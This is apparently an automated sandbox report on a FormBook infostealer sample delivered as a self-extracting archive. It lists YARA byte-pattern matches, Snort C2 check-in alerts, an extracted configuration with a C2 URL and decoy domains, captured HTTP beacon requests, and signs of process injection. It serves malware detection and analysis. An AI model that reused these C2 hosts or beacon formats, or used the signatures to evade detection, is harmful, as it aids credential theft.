2.2.bstkiooen.exe.400000.1.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.bstkiooen.exe.400000.1.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a49:$sqlite3step: 68 34 1C 7B E1 0x17b5c:$sqlite3step: 68 34 1C 7B E1 0x17a78:$sqlite3text: 68 38 2A 90 C5 0x17b9d:$sqlite3text: 68 38 2A 90 C5 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
1.2.bstkiooen.exe.1010000.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.bstkiooen.exe.1010000.1.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
1.2.bstkiooen.exe.1010000.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.bstkiooen.exe.1010000.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
2.0.bstkiooen.exe.400000.7.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.0.bstkiooen.exe.400000.7.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
2.0.bstkiooen.exe.400000.7.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.0.bstkiooen.exe.400000.7.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a49:$sqlite3step: 68 34 1C 7B E1 0x17b5c:$sqlite3step: 68 34 1C 7B E1 0x17a78:$sqlite3text: 68 38 2A 90 C5 0x17b9d:$sqlite3text: 68 38 2A 90 C5 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
1.2.bstkiooen.exe.1010000.1.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.bstkiooen.exe.1010000.1.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
1.2.bstkiooen.exe.1010000.1.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.bstkiooen.exe.1010000.1.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a49:$sqlite3step: 68 34 1C 7B E1 0x17b5c:$sqlite3step: 68 34 1C 7B E1 0x17a78:$sqlite3text: 68 38 2A 90 C5 0x17b9d:$sqlite3text: 68 38 2A 90 C5 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
2.0.bstkiooen.exe.400000.5.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.0.bstkiooen.exe.400000.5.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
2.0.bstkiooen.exe.400000.5.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.0.bstkiooen.exe.400000.5.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a49:$sqlite3step: 68 34 1C 7B E1 0x17b5c:$sqlite3step: 68 34 1C 7B E1 0x17a78:$sqlite3text: 68 38 2A 90 C5 0x17b9d:$sqlite3text: 68 38 2A 90 C5 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 15 entries

Snort Signatures

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.3 - Destination IP: 103.224.212.221

Timestamp:	192.168.2.3103.224.212.22149708802031412 10/03/22-16:00:41.738205
SID:	2031412
Source Port:	49708
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.3 - Destination IP: 103.224.212.221

Timestamp:	192.168.2.3103.224.212.22149708802031449 10/03/22-16:00:41.738205
SID:	2031449
Source Port:	49708
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.3 - Destination IP: 103.224.212.221

Timestamp:	192.168.2.3103.224.212.22149708802031453 10/03/22-16:00:41.738205
SID:	2031453
Source Port:	49708
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Yara detected FormBook

Source: Yara match	File source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\F61A.tmp

Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe

ReversingLabs: Detection: 23%

Machine Learning detection for sample

Source: primosdv3.1.1.0.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe

Joe Sandbox ML: detected

Source: 1.2.bstkiooen.exe.1010000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 13.2.svchost.exe.3a2f840.4.unpack	Avira: Label: TR/ATRAPS.Gen5
Source: 2.2.bstkiooen.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.0.bstkiooen.exe.400000.5.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.0.bstkiooen.exe.400000.7.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 13.2.svchost.exe.60d900.1.unpack	Avira: Label: TR/Patched.Ren.Gen

Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.nordenergogrup.store/sk29/"], "decoy": ["invycons.com", "txirla.com", "skygrade.site", "mydubai.website", "giftr.online", "fotothink.com", "receitaspanelacaseira.online", "theroost.dev", "hy-allure.com", "homefilmcompany.online", "qest-mall.net", "palochkiotrollov.online", "aibset-terms.com", "clecrffp.work", "entel04.online", "conveyancercentralcoast.com", "evaij.info", "meitue.shop", "rothchild.top", "detecter-un-logiciel-espion.com", "pondokvaksin.net", "ethelh.club", "ky5653.com", "harriscountywageclaim.com", "ky9239.com", "medicierge.com", "hhro.us", "uuapple.tokyo", "lakeshoreguesthouse.com", "meiguoguo.top", "bennyrivera.photography", "mysittarausa.com", "suytrin.online", "sandstormcase.us", "amzn-2135.click", "galaxycrime.shop", "cabinetis.com", "rapidsketch.live", "nickhouston.com", "kinksandlocs.africa", "perinatolog.xyz", "soluofcr.com", "ethpow.domains", "cardinalchats.cloud", "macaront.info", "createorcollect.com", "csjkmcwl.work", "foxrightnow.site", "teazyy.com", "assafoetida-rife.biz", "surprisee.fun", "merkur-privatbanks-de.net", "wikipediathrive.com", "vijaysriniketan.tech", "nxaey.com", "shiershi.shop", "rthesieure.com", "deloxexchange.ltd", "dropmarketsystem.com", "49715.biz", "veganmetavers.xyz", "hty268.vip", "bfuiaccw.online", "beachsyndicate.info"]}

Source: primosdv3.1.1.0.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: primosdv3.1.1.0.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: primosdv3.1.1.0.exe
Source:	Binary string: wntdll.pdbUGP source: bstkiooen.exe, 00000001.00000003.255333801.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, bstkiooen.exe, 00000001.00000003.253799569.0000000002B30000.00000004.00001000.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000003.256993288.00000000012EE000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000003.258974498.0000000001485000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.369549780.0000000003300000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.516086172.000000000361F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.514388101.0000000003500000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: bstkiooen.exe, bstkiooen.exe, 00000002.00000003.256993288.00000000012EE000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000003.258974498.0000000001485000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.369549780.0000000003300000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.516086172.000000000361F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.514388101.0000000003500000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: bstkiooen.exe, 00000002.00000002.367843767.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.372391636.00000000034E0000.00000040.10000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: bstkiooen.exe, 00000002.00000002.367843767.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.372391636.00000000034E0000.00000040.10000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C6A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_00C6A69B
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C7C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_00C7C220
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C8B348 FindFirstFileExA,	0_2_00C8B348

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe

Code function: 4x nop then pop edi

2_2_0040E471

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 103.224.212.221 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 5.101.152.161 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.nordenergogrup.store
Source: C:\Windows\explorer.exe	Domain query: www.sandstormcase.us

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49708 -> 103.224.212.221:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49708 -> 103.224.212.221:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49708 -> 103.224.212.221:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.nordenergogrup.store/sk29/

Source: Joe Sandbox View

ASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU

Source: global traffic	HTTP traffic detected: GET /sk29/?f2Jdmp=/dAaGq0HlK8GRVwC0eZiOsNSw3Abl/LxCMSzQhtOo+vkboQqmAD6TQGCAVscPIh/3NW5&j8Ot3=AVtD HTTP/1.1Host: www.nordenergogrup.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sk29/?f2Jdmp=M3Z0NOd5fAliwCg3EZwT2t6453H5ahVdrEePvIndisgPyIDGbv67zsai9msKV993IDUg&j8Ot3=AVtD HTTP/1.1Host: www.sandstormcase.usConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 103.224.212.221 103.224.212.221

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Mon, 03 Oct 2022 14:00:19 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 284Connection: closeVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 31 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 6f 72 64 65 6e 65 72 67 6f 67 72 75 70 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.51 (Unix) Server at www.nordenergogrup.store Port 80</address></body></html>

Source: svchost.exe, 0000000D.00000002.517398218.0000000003F1F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://ww38.sandstormcase.us/sk29/?f2Jdmp=M3Z0NOd5fAliwCg3EZwT2t6453H5ahVdrEePvIndisgPyIDGbv67zsai9m
Source: explorer.exe, 00000003.00000000.335934936.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.310782659.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.276212440.000000000F276000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J

Source: unknown

DNS traffic detected: queries for: www.nordenergogrup.store

Source: global traffic	HTTP traffic detected: GET /sk29/?f2Jdmp=/dAaGq0HlK8GRVwC0eZiOsNSw3Abl/LxCMSzQhtOo+vkboQqmAD6TQGCAVscPIh/3NW5&j8Ot3=AVtD HTTP/1.1Host: www.nordenergogrup.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sk29/?f2Jdmp=M3Z0NOd5fAliwCg3EZwT2t6453H5ahVdrEePvIndisgPyIDGbv67zsai9msKV993IDUg&j8Ot3=AVtD HTTP/1.1Host: www.sandstormcase.usConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: bstkiooen.exe, 00000001.00000002.380669907.000000000109A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
